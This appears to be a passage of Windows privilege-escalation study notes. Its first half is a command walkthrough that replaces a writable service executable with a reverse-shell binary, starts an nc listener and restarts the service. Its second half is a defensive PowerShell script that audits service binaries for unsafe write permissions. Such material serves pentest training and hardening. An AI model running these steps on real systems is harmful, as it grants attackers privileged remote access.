If the original service executable is `modifiable` by our user, we can simply replace it with our reverse shell executable. Remember to create a backup of the original executable if you are exploiting this on a real system.

```bash
# Example scenario
# winpeas output says a service executable (filepermservice.exe) is modifiable

# verify with accesschk
.\accesschk.exe /accepteula -uvqw "C:\Program Files\File Permissions Service\filepermservice.exe"

# check stop/start service permissions
.\accesschk.exe /accepteula -uvqc filepermsvc

# back up the original
copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp

# copy our reverse shell and overwrite the original service executable
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"

# set up a listener on the attacker host
rlwrap nc -lvnp 443

# start the service (net start takes the service name, not the executable name)
net start filepermsvc
```
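
The same condition can be audited across every service from the defender's side. The PowerShell below is an added example, not part of the original notes: it lists service executables whose ACL grants write-type rights to anyone outside a trusted set. The function names and the trusted-principal list (English account names) are assumptions to adjust for your environment.

```powershell
# Added example: audit service executables for write access granted to
# principals outside a trusted set.
# Assumption: English account names; extend the list for your environment.
$TrustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller'
)

# Rights that allow replacing the file or rewriting its ACL. Read/execute bits
# are deliberately excluded so ReadAndExecute-only ACEs do not match.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
# Raw GENERIC_ALL / GENERIC_WRITE bits, which Get-Acl can return unmapped.
$GenericWrite = 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath([string]$PathName) {
    # Quoted form: "C:\Program Files\App\svc.exe" -arg
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    # Unquoted form: take everything up to the first ".exe"
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $null
}

function Get-WritableServiceBinary {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = Get-ServiceBinaryPath $svc.PathName
        if (-not $path -or -not (Test-Path -LiteralPath $path)) { continue }
        $acl = Get-Acl -LiteralPath $path -ErrorAction SilentlyContinue
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
            $rights = [int]$ace.FileSystemRights
            if (($rights -band [int]$WriteRights) -or ($rights -band $GenericWrite)) {
                [pscustomobject]@{
                    Service  = $svc.Name
                    Path     = $path
                    Identity = $ace.IdentityReference.Value
                    Rights   = $ace.FileSystemRights
                }
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize -Wrap
```

Any row naming `BUILTIN\Users`, `Everyone`, `NT AUTHORITY\Authenticated Users` or an ordinary user account is a finding; remove the write ACE from the binary and check the containing directory as well.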